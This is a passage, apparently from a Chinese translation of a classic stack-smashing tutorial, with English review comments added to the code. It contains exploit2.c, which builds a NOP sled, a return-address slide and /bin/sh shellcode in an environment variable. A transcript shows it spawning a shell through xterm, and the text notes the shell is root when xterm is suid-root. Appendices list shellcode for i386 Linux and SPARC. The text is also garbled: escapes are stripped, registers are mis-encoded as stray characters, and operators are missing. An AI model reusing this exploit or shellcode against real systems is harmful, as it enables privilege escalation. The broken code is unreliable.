栈顶 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF 栈底
buffer ebp ret a b c
<------[NNNNNNNNNNNSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
^ |
|___________|
现在我们就能够根据这个方法编写我们的攻击程式了.
exploit2.c
------------------------------------------------------------------------------
#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define NOP 0x90
/* Machine-code bytes of the i386/Linux payload whose assembly source is
 * listed in Appendix A; the literal ends in the "/bin/sh" string that the
 * assembly's .string directive produces.  In this copy the backslash of
 * every `\x` escape has been stripped by the text extraction, so as printed
 * the array holds plain characters rather than the byte sequence the
 * program expects. */
char shellcode[] =
"xebx18x5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80xe8xecxffxffxff/bin/sh";
/*
 * Returns the caller's current stack pointer.
 *
 * The inline asm copies %esp into the return register; the destination
 * operand is mis-encoded as `陎` in this copy (presumably %eax, the i386
 * return register -- the same substitution appears throughout Appendix A).
 * There is no return statement, so the value reaches the caller only via
 * the register convention, which standard C does not guarantee (using the
 * result of a non-void function that falls off its end is undefined
 * behaviour); a reviewer would expect an explicit return.
 */
unsigned long get_sp(void)
{
__asm__("movl %esp,陎");
}
/*
 * Builds an environment string of the form EGG=<address slide | NOP sled |
 * payload> and spawns a shell that inherits it, so that a program started
 * from that shell can be given the string as an argument (the xterm
 * transcript below shows the intended use).
 *
 * argv[1]  buffer size in bytes (default DEFAULT_BUFFER_SIZE)
 * argv[2]  offset subtracted from this program's stack pointer
 *          (default DEFAULT_OFFSET)
 *
 * Review notes on this copy:
 *  - `void main` with no return is non-standard; `int main` is portable.
 *  - printf/strlen/memcpy/putenv/system are called but only <stdlib.h> is
 *    included, so they are implicitly declared (<stdio.h> and <string.h>
 *    are needed).
 *  - Text extraction has dropped characters: the increments of the three
 *    for-loops, the operator that forms `ptr` from `buff`, the terminator
 *    literal, and the `\x` escapes in `shellcode`.  The listing therefore
 *    does not compile as printed and is reference material only.
 *  - The layout it builds (return-address slide, NOP sled, code executed
 *    from a writable stack) is exactly what non-executable stacks, ASLR
 *    and stack canaries were introduced to break; on a current system the
 *    technique does not work unmodified.
 */
void main(int argc, char *argv[])
{
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
/* atoi() reports no errors: a non-numeric, zero or negative argument is
 * passed straight on to malloc() and the loops below.  strtol() with an
 * explicit range check would reject such input. */
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset= atoi(argv[2]);
if (!(buff = malloc(bsize)))
{
printf("Can't allocate memory. ");
exit(0); /* NOTE(review): failure path exits with a success status */
}
/* Guess where the buffer will sit on the target's stack: this process's
 * own stack pointer minus the user-supplied offset. */
addr=get_sp()-offset;
printf("Using address: 0x%x ", addr); /* addr is a long; %x expects unsigned int */
ptr=buff;
addr_ptr=(long *)ptr;
for(i=0;i<bsize;i =4) *(addr_ptr )=addr; // fill the whole buffer with the guessed entry address (the loop's increment is lost in this copy)
for(i=0;i<bsize/2;i ) buff[i]=NOP; // first half becomes a NOP sled (increment lost in this copy)
/* Position the payload in the middle of the buffer; the operator between
 * buff and the parenthesised offset is missing in this copy (presumably +). */
ptr = buff ((bsize/2) - (strlen(shellcode)/2));
for (i=0;i<strlen(shellcode);i ) *(ptr )=shellcode[i]; // copy the payload into the middle (increment lost in this copy)
buff[bsize-1]=''; /* terminator; the literal is empty in this copy (presumably '\0') */
memcpy(buff,"EGG=",4); // overwrite the first four bytes so the string reads EGG=...; putenv() keeps a pointer to buff, so it must stay allocated
putenv(buff);
system("/bin/bash"); /* spawn a shell that inherits EGG in its environment */
}
------------------------------------------------------------------------------
好,现在我们来试验一下这个程式的效能如何.这次的攻击目标是xterm(任何链接了Xt Library的程式都有此缺陷). 首先确保X Server在运行并且允许本地连接.
------------------------------------------------------------------------------
[aleph1] $ export DISPLAY=:0.0
[aleph1] $ ./exploit2 1124
Using address: 0xbffffdb4
[aleph1] $ /usr/X11R6/bin/xterm -fg $EGG
Warning: some arguments in previous message were lost
bash $
------------------------------------------------------------------------------
OK! 看来我们的程式确实很好用.假如xterm有suid-root属性,那么这个shell就是个具备root权限的Shell了.
--------------------------------------------------------------------------------
Appendix A - 若干操作系统/平台上的 Shell Code
i386/Linux
------------------------------------------------------------------------------
/* i386/Linux payload: the assembly source of the `shellcode` byte string in
 * exploit2.c.  Several register operands are mis-encoded in this copy
 * (陎, 離, 靫, 韝); 陎 matches the substitution in get_sp() and is
 * presumably %eax.  The jmp / popl %esi / call sequence is the usual way
 * of obtaining the address of the trailing "/bin/sh" string without
 * knowing where the code was loaded; each `int $0x80` enters the Linux
 * system-call gate with the call number in %al / %eax.  For detection
 * purposes, the short forward jmp paired with a backward call, an
 * `int $0x80`, and an inline "/bin/sh" literal are the recognisable
 * traits of this payload family. */
jmp 0x1f
popl %esi
movl %esi,0x8(%esi)
xorl 陎,陎
movb 陎,0x7(%esi)
movl 陎,0xc(%esi)
movb $0xb,%al
movl %esi,離
leal 0x8(%esi),靫
leal 0xc(%esi),韝
int $0x80
xorl 離,離
movl 離,陎
inc 陎
int $0x80
call -0x24
.string "/bin/sh"
------------------------------------------------------------------------------
SPARC/Solaris
------------------------------------------------------------------------------
/* SPARC/Solaris payload.  The sethi/or immediates loaded into %l6/%l7
 * presumably spell the "/bin/sh" string, which `std` places just below
 * the adjusted stack pointer together with an argv-style pointer pair
 * (st %sp, then a null from %g0).  `ta 8` is the Solaris system-call
 * trap with the call number in %g1 (0x3b first, then 1 after zeroing
 * %o0).  The SunOS listing below is the same code with a different trap
 * form. */
sethi 0xbd89a, %l6
or %l6, 0x16e, %l6
sethi 0xbdcda, %l7
and %sp, %sp, %o0
add %sp, 8, %o1
xor %o2, %o2, %o2
add %sp, 16, %sp
std %l6, [%sp - 16]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
ta 8
xor %o7, %o7, %o0
mov 1, %g1
ta 8
------------------------------------------------------------------------------
SPARC/SunOS
------------------------------------------------------------------------------
/* SPARC/SunOS payload: identical to the Solaris listing above except that
 * the trap is issued through %l5 (loaded with -1); the operator between
 * %l5 and 1 on both `ta` lines is lost in this copy (presumably `+`). */
sethi 0xbd89a, %l6
or %l6, 0x16e, %l6
sethi 0xbdcda, %l7
and %sp, %sp, %o0
add %sp, 8, %o1
xor %o2, %o2, %o2
add %sp, 16, %sp
std %l6, [%sp - 16]
st %sp, [%sp - 8]
st %g0, [%sp - 4]
mov 0x3b, %g1
mov -0x1, %l5
ta %l5 1
xor %o7, %o7, %o0
mov 1, %g1
ta %l5 1
--------------------------------------------------------------------------------
Appendix B - 通用 Buffer Overflow 攻击程式
shellcode.h
------------------------------------------------------------------------------
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "x90"; /* the one-byte i386 NOP used for the sled; the `\x` escape is garbled in this copy */
char shellcode[] =
"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"




